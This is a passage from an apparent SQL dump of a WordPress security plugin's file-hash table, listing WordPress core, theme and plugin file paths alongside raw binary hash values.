HF�n�L�Bja','',0,'?'),('���I0��B,�hʛp','wp-includes/class-wp-term-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y\"������4XYt[','��m⟮/�a�Ͳ(yMG.��dЪZ+����','',0,'?'),('�������賮]','wp-includes/customize/class-wp-customize-code-editor-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��jM�і���lM��_','�xFZ�Kc��3�7�`Ԫ$j�g�]�Q��','',0,'?'),('�Z�\Z�5\n�j�}�@','wp-includes/blocks/buttons/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T���9���D?_�7E','��Y]K܊�QS駤��k;� ͥ�{/ʅ�j�','',0,'?'),('�F�����m���','wp-content/plugins/wordfence/modules/login-security/views/options/option-label.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|<��>sZ�K�z�e','�̆;�n�E��!��Z�\ZV��V H��w','',0,'?'),('�Z�\ZaYH\0 �5�~ ','wp-admin/includes/class-wp-automatic-updater.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-Wŝ#���\"Z��Ɣ]E','f?��Y4e��+���~�ěw�K7�w�Mu���','',0,'?'),('�QR\"��@3��v�S','wp-admin/js/link.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g�֞`�1ٕx�w��','����^���R+Ȝ�I5S$i���\0����2�','',0,'?'),('�G� ��~���`�','wp-includes/customize/class-wp-customize-nav-menu-name-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7�f�W�՚7���','p��v�w ��ܪ9����?���a���z�','',0,'?'),('��f�W�4���%���','wp-content/plugins/wp-cerber/assets/flags/nz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X �7�7��c.�ujߖl','4ȯYI4�T)��H�;�rd�Q��g���Ӆ','',0,'?'),('��M�B�!:�','wp-content/plugins/wp-cerber/assets/flags/it.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{/�z]�>��F@�B�','ⴟ��k �9b��md6�l�{e� o���','',0,'?'),('��;��#8�d_�r(�E','wp-content/themes/skt-toothy/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D{��ocXN 仺�','���V3B��i����w�2f/�yn7�L�v','',0,'?'),('��\Za�]]�A��\'h���','wp-admin/network/settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�iҎ�L�>�e�*�.��','�+Vƃ/�gyg>��\'$�L*yXc� �w�a5','',0,'?'),('��7��w�J���8�','wp-content/themes/regina-lite/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T���@�,�[�Uq�','z\\�B�aQ����\"���g\n��\n��C5�','',0,'?'),('����=�c�ه���','wp-admin/includes/upgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������\\ƥ�/��','�+�w}�U�K�f�%f�q��荁��im��\Z��','',0,'?'),('��eC����Di!��','wp-admin/css/colors/coffee/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U��s�[0�\n��2-�','a����RC�J)�!�{Mt@�B}�\n�G�5��\0','',0,'?'),('���f�%u�P���','wp-includes/js/mce-view.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����<��@^�P�\'','#�� ��\\P�Wdqߋ��.��4Ó��x<�','',0,'?'),('�\Z���{:\Z���4f','wp-includes/js/customize-preview-nav-menus.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[Nm �l�VҪ3���','�5,��M3�5��n(tL5��;^��P/9z���8','',0,'?'),('�#��*��I�bGB','wp-content/themes/skt-toothy/images/loading.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k{�ï\"I��\n���','�o�\0Cj���\ZM�;2�D���\r�2 ����','',0,'?'),('�.�z��&���.�1y��','wp-includes/css/dist/format-library/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t���A8�x��l�','K�cK��&�2�\0���=��g�.�ٜ�� \0y','',0,'?'),('�H��\\�\\�j��ѕ7','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-preset.php',0,'�O���=H�(!�-y�','�O���=H�(!�-y�','�d��u�D�:}��LD�pX�Le¸|���\r�','',0,'?'),('�r)�aQ��}�p6ϸ�','wp-content/themes/doctors/core/contents/loop_404/skin1/html.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c�; `-��wbo�?','�w��&�x��h0�萳E��,��]����','',0,'?'),('�s4(S��Chz�fb���','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���M���+S�O���]','x6�@�\n�qv�dR>��{�8^�_��pQ','',0,'?'),('�yѼ5��!*�� ��','wp-content/themes/twentytwentyone/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�gd�w���}�$\'e�','E�u)��l��E�4����觏�篓�W���zF','',0,'?'),('�a�MM����<P�','wp-content/themes/healthcare/css/font-awesome/scss/_screen-reader.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}�G���Uh�o�','�1�4<6�ԇ����&�V�N�㋂���ء��','',0,'?'),('��N���F�V�Y�C','wp-includes/blocks/shortcode.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0t� �ڨ.�j�','{��bw\n~��4�n\"��\"�����#.m�/#1','',0,'?'),('��uy�؟�uV��@/��','wp-includes/class-wp-block-patterns-registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O�>�O^��\"����','͊�Y��V�y���}��&m�{�5jJ)0�!','',0,'?'),('����D��nk���','wp-content/themes/twentytwentyone/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wu�e\Z�A�K� m�','Uř�����!¿r�Iq�q�[�j�BCY�Pl%','',0,'?'),('�@}&�J~�¾&��\0','wp-includes/customize/class-wp-customize-new-menu-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��N��p��aC�q�k','�F��0�Hyce�LuQ���&��LiH\n�DũK','',0,'?'),('����m�N�8P��','wp-content/themes/healing-touch/image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�OƲA����+���[','�(F�ܒ�:k-��^_�X\\q�y�_�����%�(','',0,'?'),('�H\Z���.���hR�bn','wp-content/plugins/wp-cerber/assets/flags/io.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��<���e�e���C�','��ɫ-�)i�l�\na�1��}!�}~���� pd�','',0,'?'),('�Y^~5~��p�G-���','wp-includes/js/customize-views.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Hӷ�-\\Me���','�b����L��-���9wlo��y�$+�Y\Zޘ�N','',0,'?'),('�b�m|\"�[^�oh��','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-toggle-control.php',0,'m�ikox�E%��x�U','m�ikox�E%��x�U','G�M\"R��W.`�x������֎.�Q�\\��i�K','',0,'?'),('�rI����ɀ5 �F�','wp-includes/Requests/Exception/Transport.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��l��z�� J�^�','����ĺ�̌��&���ֳ���4@78���p','',0,'?'),('�r~g�؛����ݾ�','wp-content/themes/doctors/core/contents/loop_templateContact/templateContact.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('�u_����~!\0�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y=\nY�99�2���','���6���\Z/���p�y5��E�ح���O�E','',0,'?'),('�z������|�z�xv','wp-includes/js/jquery/ui/droppable.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>���K�-�E،�N�','�\\�\'䰹\"�jq#�7��ER��F�0*�-�;|','',0,'?'),('����˕��r&�q�Fi','wp-content/plugins/wordfence/crypto/vendor/composer/installed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K:�Q�)�˸�:-*','��8}�ު�]��\"1���&(��䙄�����','',0,'?'),('�1�3�\"ȟ�fˬ','wp-content/plugins/redirection/locale/json/redirection-en_CA.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��T|>U��=۶�.*�','��o����,�$B��D�H���hÀd{���8','',0,'?'),('�;��+�&Y��Đ','wp-content/plugins/wp-cerber/assets/multi/multi.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z/�Wn�U#֬��V�K','��\"��%����6�rH��B)�xf�L]4t��','',0,'?'),('リQ�����)B\n�,','wp-content/plugins/wordfence/images/loading_large.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y��{Ob�UW~�Y˙','p8�\'��� t���:�Q�o]{5G1����E��','',0,'?'),('��P��a`Xu','wp-admin/css/color-picker-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��i��S-MؼF�N','m\Z�Lչ����ο�1m�aɤ�Rr�1A7','',0,'?'),('�����\\&�}R\ZC','wp-content/themes/healthcare/js/owl.carousel.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v���~�TE�-γ','^S����B�ŅZ�C8�\\s�P��c7M��[\n','',0,'?'),('��X=U�pfp���Z','wp-includes/taxonomy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5��H\nC8h��:��N','I�\r�u}�����Yw�Su:<IF���','',0,'?'),('�ތt+�\\�+�Xa�ZU','wp-content/plugins/wordfence/lib/wfScan.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��L�n�?2��a~��','�+p��=���ͨ�\'�Bk���@Cr\'ͺ�\'','',0,'?'),('�㯩� \'��ި��V','wp-includes/images/smilies/icon_biggrin.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K��Jr��:�]kI�|',':������ٔ���M����X% �<8�g4�','',0,'?'),('��&�e3%$��8:�:w','wp-content/themes/advance/inc/kirki/assets/js/controls/palette.js',0,'N�x���Bq�#�\n��','N�x���Bq�#�\n��','�6F�[�شU�l���D���\0�\r5nRaMH','',0,'?'),('���\rd<�gR��4b�','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/customizer/panels/class-epsilon-panel-regular.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+�}�T�HA','%��\ra*r�H�V���x��\0!��_g�]R','',0,'?'),('��6X�Ԫ4��[_��=t','wp-content/plugins/wordfence/lib/wfScanEngine.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wz�PQQ�#�Z>\0��D�','���i:��i`�\"��J��%<:���I��xcJ','',0,'?'),('��c��G���(`E��','wp-content/plugins/wordfence/views/scanner/issue-configReadable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� �������Q��L','���R21�?nj*=bͥ}�����X&��M��Ʒ','',0,'?'),('��9��r�Mԧ��','wp-includes/js/customize-preview-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T-�6�P)H�=��','����6ª�e����yмbdf}��5��','',0,'?'),('� �ލ<:9�|��6','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-_�b�->O��\\苃','�sɔg�%��riC��P��w��%��{��J��','',0,'?'),('���6)Jo*��Nn+','wp-includes/js/dist/vendor/wp-polyfill-object-fit.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?с;��9�A����t�\n','�k���O�{d��PS���\0M�\"B]�\"�E��','',0,'?'),('�$�ī�I�^��3���','wp-admin/menu-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�P�j�v�˨!ң�','w��9=̠F5d��oU���\\_�k[�','',0,'?'),('�,�M�x�*|Z4�Lz$','wp-content/themes/regina-lite/template-parts/content-search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�`_/��6)�E�z�','W�P�5�WD�[�ֶ��.�ant��l��1�.','',0,'?'),('�I/\Z�N�2�����p','wp-includes/sodium_compat/src/Core32/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(��|v�}�9S�9S','\n,,Y�B��:�En������4�f\r�,��Zbq','',0,'?'),('�M+c3�;`(B�P\n>�E','wp-content/themes/healthcare/js/theme-scripts.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ajNT��y���W\"','�� >�\r�Up��)�qᅤ2���j�T��4�Y','',0,'?'),('�g-�_F�\"���~�\\^T','wp-content/plugins/all-in-one-wp-security-and-firewall/images/success.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t I �C@g���','�(��(� (\'S)\0B��_}&l�&�o^s�','',0,'?'),('��s�\r%��@���r','wp-content/themes/regina-lite/inc/components/related-posts/class-mtl-related-posts-output.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>X�O�e�]#`s�W�','��$�|#gp3��n<��N1�<mF_�kk�H�','',0,'?'),('�N ���iiڭ�','wp-includes/random_compat/random_bytes_libsodium_legacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[q�7d�v���z�','\'֪��* [\0EE*J�r�V�s�����c�?','',0,'?'),('��mT���6��','wp-content/themes/healthcare/css/font-awesome/scss/_animated.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�O5�{��XPuq_A��','�����@�YV�\r�6��&O4A��Z<x��u','',0,'?'),('�\'ݒ\rTvr���ŷ�','wp-content/themes/weblog/assets/img/no-image-690-400.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r�6�ؑ���`�q���',')S?�zZ�C� zB�]�A�n�L���抒���Q','',0,'?'),('��y�u�n���c[٧�','wp-includes/sitemaps.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gG�xN�)�/���*','�%��S�i����x3�k���O��nz]���','',0,'?'),('�з&�L۽¨��VN�','wp-includes/css/buttons.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a��n��G��f�g���','k!L4>H�i�AF��f�BR�eR@����W�','',0,'?'),('�����9�$�DS�','wp-content/plugins/all-in-one-wp-security-and-firewall/images/feature-points-badge-bg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=5�gB����!b��','W��#nl3��P� r �l��c=א/ȑ��O:','',0,'?'),('����6$[���O�','wp-admin/css/customize-widgets.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%\'d \\������sPu�','���o^ ��I���_qJ�s��=�-+����','',0,'?'),('���rp.u�3zx�','wp-admin/includes/class-ftp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����c�Z*l3��$�','�B�1ô� ͥ��5 �Q�������9�J','',0,'?'),('�&�?.\r�s��;�=9','wp-content/themes/twentynineteen/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}D�&��J����','z<����@���I�W�JP\n�T^tۜ�E�','',0,'?'),('���1B���DG���','wp-content/themes/regina-lite/inc/customizer/assets/css/preview.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y�i�>sY�����I','��w�\\2�\rvP4�0f�]���B�@��eN�','',0,'?'),('�&[��>j���/��GU','wp-includes/js/dist/token-list.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]L\'9jl7��[#�','�\"�Gc��iL���z5�DwN�#G��ZT{*s}�','',0,'?'),('�6������F�rXb','wp-content/themes/healthcare/tag.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Β�ַc!�J�#��Г','_}�!ƭQ~�M�%$�m� ��<S.m����t','',0,'?'),('�7s�\\]�}�AA�we1�','wp-admin/tools.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�RC7�\n����TR�','v\'S�;��[�\nS�/[S6�&�G&�Ɩ8�','',0,'?'),('�8���םG2��*Ğ�','wp-content/plugins/wp-cerber/assets/sh/styles/shCore.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`L�1�Rg<�1�&�','g�0��!r�(��)�uT�T^۽S���Vv�','',0,'?'),('�Z/���{Lt�ծF$�','wp-admin/js/svg-painter.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�\'�;I6��U+�K�','A�Οն<��ލ��&0��>�k]�-GfN�','',0,'?'),('�v�:�D�Y�G','wp-includes/js/plupload/plupload.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���6�JJ�7�+�','�+\"��Q���/N:�T$��\"���ȯ\r8v_3','',0,'?'),('�\"%=@\'N}pH�^d','wp-content/themes/healing-touch/images/call-icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ˊK٩]����M�D','#B�4tS�&���c�@H���σ���Z�z|','',0,'?'),('�TY�PpE�w��','wp-includes/widgets/class-wp-widget-archives.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�POůJ�~�l�.�J','�o���`|?�0�5���q����_ !-+}Q�V-�','',0,'?'),('��4�����$ꎪ','wp-content/plugins/wordfence/views/scanner/scan-scheduling.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A�i@�\\�`=�y�7\0','���-\020�[��5�B���c��^V�u8��k�','',0,'?'),('�����j�c��8�L','wp-content/themes/vision-lite/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʸ��R̍o�i��s','�o F�c����Қ����\Z��u�ߴ�F$�','',0,'?'),('��\0�skk�Tu3So\\�','wp-content/plugins/wp-cerber/assets/flags/mw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/��a�D�o�=hs','4[����Պ\'6N���RP��15��}\Z��s�','',0,'?'),('�絛�zy���>_+�t','wp-includes/class-wp-user-meta-session-tokens.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8/\'\0�\0��vSL-G\0','����8�b�YB&?�6��o���>','',0,'?'),('���H�r #�w/�:4','wp-includes/js/dist/plugins.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Eg���Zm\Z��4\0�','�ьZ;�9�c`.�Є�7��7�S��Z?��mߜ','',0,'?'),('�,����U(�e�jR.XP','wp-content/plugins/wp-cerber/assets/flags/aq.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('�1\n�����x����','wp-includes/blocks/latest-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i{�$F�ČPի!','\Z:����F��s�K�����\\��W����\r��','',0,'?'),('�?��E_�)�xڅ$��','wp-admin/includes/deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#�#1���@伫֝k','y�\"pB�c�h��\0�PhD�Rd��\0bKO��','',0,'?'),('�d�To�f��ҷ�bS','wp-content/plugins/wordfence/lib/menu_dashboard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��1q��X}k8�','����\ZI(�b��ܚo��ߍ�9�\0� ȅE2','',0,'?'),('�j��\nj<�c�@B�X','wp-content/plugins/wordfence/modules/login-security/views/options/option-textarea.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�q�טw�U��ͰR�','�JwYw�u�n��[���&D�FLV-�2L���','',0,'?'),('�po���X0%������','wp-includes/css/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b��d�(�*ț��K��','���$��l#��X#u��>�G�j�I;ߗ߮','',0,'?'),('�u;Ȍ0�q�w��=��','wp-content/plugins/wordfence/lib/dashboard/widget_networkattacks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8q�X�n�_�tҐi�','Sb�O��m����/IQ>SĊW�ɖT�oV�+a','',0,'?'),('�yA��>�WXM�.hr7','wp-content/themes/weblog/acmethemes/customizer/header-options/header-logo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���63�����Pd��','�G1����^����SX�^���Ͳ��N��','',0,'?'),('���jK�&����Y','wp-content/plugins/akismet/class.akismet-admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����a�&+�!�]�M�','���iK�I�]�#:6���o�EP�\n�nR$���\r','',0,'?'),('��[w&���m?}|��','wp-content/themes/doctors/core/includes/trunk/ds1/ds1_mods.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�<m�A�\r�H�Jk','�f��a�lQJ�5�n<��4� ee1���G�','',0,'?'),('�$c{�97^І�J�g','wp-includes/js/dist/server-side-render.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6�o�i)=�\"p�Jhl','m��z��}ힳ�M��|N�b����Zi�-','',0,'?'),('��ŕ��oi|}��','wp-includes/block-supports/custom-classname.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ؚ�WiY�C��v�G','� #rCҗ�)�[�ȫ�R̞[���Q�\\�&��','',0,'?'),('�M�٦M�/`�','wp-includes/js/swfupload/handlers.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*�#�0�-�Ճp�','H�#����a:��1������߯orrj�uz�zV','',0,'?'),('��B�R�z��Y','wp-includes/js/jquery/jquery.table-hotkeys.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o�go����~i�I �','�<��=���;�:�t_,w�ăI���,�,��','',0,'?'),('�?{o_���\'�n�','wp-admin/images/resize-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{3VV��FV�f�%K','懴y2q��Z�o��~��([��`\0`C�i\ZL\'','',0,'?'),('���_f $�O<o','wp-admin/js/common.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$�ϋOny&��-���n',',�#�]�d���!�I|�4<�n�ނ�r\0,�','',0,'?'),('��%�\0��z�f�N�pS','wp-includes/js/tinymce/plugins/wpemoji/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SE���x=d��~���eM','\"�w�%%{���=L(���hK�\rƢH�P','',0,'?'),('��w�+\"+�$��^�','wp-content/plugins/wordfence/lib/wfLog.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WN ;ƶxv��/ �','K�PQn\"�_(�X/4S�䖏C�9�yA�K�L','',0,'?'),('��\Z�B V�݄�K��','wp-content/plugins/wp-cerber/assets/flags/gi.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',����K]�0ȥR�','/��i�fh���r���Z(b��2�\Z�>˾�->','',0,'?'),('��w(�\'�s�y��:6','wp-content/themes/twentynineteen/template-parts/content/content-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V�س���T��+W�','\roh}�}i��V�A�ԁ�H�!v�>4}��M','',0,'?'),('��֏�+=���#�Jn','wp-content/plugins/wp-cerber/assets/flags/wf.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2��iq*��@R��r�\n','}����A���xhI�z�T]�A�s�0;�y�E','',0,'?'),('���<�fÃ�y\0�Y','wp-content/themes/twentytwentyone/assets/sass/04-elements/media.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\Z�.�ʹ��g�','\"�e۰�}�)�s��ѓʫt[�\"�i����/V�','',0,'?'),('�#\\���/�vXR','wp-admin/js/theme.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~^_��\r}��V_�)x','�?l�;�t�F|t�9u�����.&{Y,A��','',0,'?'),('�<����t�t9�o�S�','wp-content/themes/healthcare/images/portfolio/2.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� 3�\Z���wס�]�','-j�\r�|�2��k-��$jR���:�:�z5m�','',0,'?'),('�V�<��r\nQ�]jvXP','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/ProviderInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z���*Nf�ټ{��','i��˶|1���v.4[�(�����m@f>��','',0,'?'),('�]��Mp vP���','wp-content/plugins/wp-cerber/assets/flags/id.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o\'�!�*�HkV��\0��<','~\0`�v��o\\ETZ�eᜊ�z�eA�`�[HF�','',0,'?'),('�c�E%D��� ��雩','wp-content/themes/twentynineteen/sass/blocks/_blocks.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�clF�,C>v�W���','bx�͗߇��J�Ne���������@RP','',0,'?'),('�lF����c뒕�L���','wp-admin/js/iris.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�0!2�}�=��n��','�K��<<�6[��0�j�0��vg������J=�','',0,'?'),('�XA�*�)�8d','wp-content/themes/skt-toothy/images/slides/slider2.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e��M�n\n��2��MX�','�w��&�g���D�m�FD�� ����r9��','',0,'?'),('��,�o�!�z�j\"�','wp-admin/css/edit.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Cqw=��*c�$[�','�6V�s4�s=T���,�ˇ4{w��m��z','',0,'?'),('�ؠ]�f���P��','wp-content/plugins/wordfence/lib/wfLockedOut.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Vb�*���\nog�D�','�o����Ч���$E�71�8�K�I�E','',0,'?'),('��V�.`Jxbe�y��','wp-content/themes/twentytwentyone/inc/custom-css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R�����k�dɐʎs','L�$0��霕A��]`��H�X\" ���q4�\'','',0,'?'),('�\Z�kD��ӖaL=[V','wp-content/themes/twentytwentyone/template-parts/content/content-excerpt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rDŽ\"����TJχٖp�','�����LJ�լ@~���\")���?A��<�','',0,'?'),('�N�����s�','wp-includes/customize/class-wp-customize-custom-css-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��^Tˮ,�\"A\n�3���',',���J�v�0�D�wB��t�fDD�H���Dgo','',0,'?'),('�̵��%�0i2�','wp-content/themes/twentynineteen/sass/mixins/_utilities.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���&�����7��','��/C�ܰ��/ŏ�@��X��Y!C�','',0,'?'),('���w)�Ä��dž�','wp-content/plugins/wordfence/css/wordfenceBox.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C���WY�~�H�#�]','�r����{��\ZI�5�O1���Q��Ӈ���C��','',0,'?'),('��S�A@=�Y���v','wp-content/plugins/wp-cerber/nexus/cerber-slave-list.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e��NG���:��l','hKu�)$�cU��o>��ᦐ���6�����','',0,'?'),('��)�X&g�a�v�E','wp-content/themes/healthcare/css/font-awesome/scss/_bordered-pulled.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�\r�{�\'��3��lk�','���8�2�.�1��4$�rTo��U�W� ��','',0,'?'),('�����➞��^R�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��o������h�g[','��߁.�-h4`9S _\r�)I�(��W��','',0,'?'),('�V��k9۴�s���ֿ','wp-admin/css/customize-controls-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ʝ��\'��dwgZ�|�','b!��&f�a�u���Lqm<.�ќ3/X�c�[','',0,'?'),('���;�^𩸴8c�','wp-includes/css/buttons.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���[��\\���.�','Lێ��b����3���y����~�>�I�t���','',0,'?'),('�$i�6]}���+���','wp-content/plugins/wp-cerber/assets/flags/gd.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(*Gkη����G֊�','�K���dh��JJ�q�yG|-<�r� S[l��','',0,'?'),('�J\'#��rN�0a\r�','wp-includes/images/crystal/audio.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�nV�:�ω�G��-#k','�~B\Z-�of|W�x\\��|�M�)���ˢ','',0,'?'),('�U�Ǒ��ku`� 